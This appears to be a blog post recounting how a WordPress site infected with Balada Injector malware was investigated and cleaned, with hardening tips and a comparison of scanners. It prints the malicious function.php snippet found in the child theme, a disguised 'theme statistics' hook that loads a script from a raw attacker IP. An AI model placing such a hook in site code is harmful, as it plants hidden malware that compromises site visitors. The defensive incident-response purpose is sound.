Beginning
Status:
- According to the pre-configured maintenance report for the website, daily scans for security vulnerabilities and website security status have detected malware.
- This has resulted in an additional external JS resource “https://147.45.47.87/scripts/theme.js” being loaded, and connecting to StickyADS.tv Ad (ads.stickyadstv.com) on the front end.
Initiating investigation
- Malware Details: VirusTotal – URL
- Related Security Information: WATCH OUT! 1 Million+ WordPress Sites Infected with Balada Injector Malware | LinkedIn
- What’s Balada malware?
Balada Injector malware is a severe threat to WordPress site owners worldwide. It exploits themes and plugin vulnerabilities to breach site security, steal data, create fake admin accounts and maintain persistent access. WordPress sites with outdated plugins, nulled themes and plugins, and weak login credentials are most vulnerable to Balada Injector malware. via WATCH OUT! 1 Million+ WordPress Sites Infected with Balada Injector Malware | LinkedIn
- After clarifying the issue, proceed with the following steps:
- Full backup first for sure.
- Use SSH command line to list files modified within one day before and after the date shown in the maintenance report.
- Prior identified the files with a modification date of April 3rd that remain unchanged after the site-wide update.
- Determine that within a child theme, typically not overwritten during updates, there exists an additional code snippet in the
function.php
file calling the external JS:
/* Theme statistics function */
function wptheme_stat() {
?>
<script async src="https://147.45.47.87/scripts/theme.js"></script>
<?php } ​ add\_action("wp\_head", "wptheme\_stat");
- Clean all caches and scan again until it appears as “Verified Clean” from every vendor.
Suggestions & Improvements
- Backup your site regularly
- Keep themes and plugins updated
- Use trusted WordPress themes and plugins
- Use strong login passwords
- Enable 2FA for all users
- Implement a reliable malware scanner
Reminds
In this case, I tried using several security plugins, including Wordfence, but none of them could identify the problem, let alone the affected files.
Sucuri is the only service provider that detected the issue, either through their online service or plugin. The results indicate that the Balada injector malware is not easy to detect and check. Well done, Sucuri!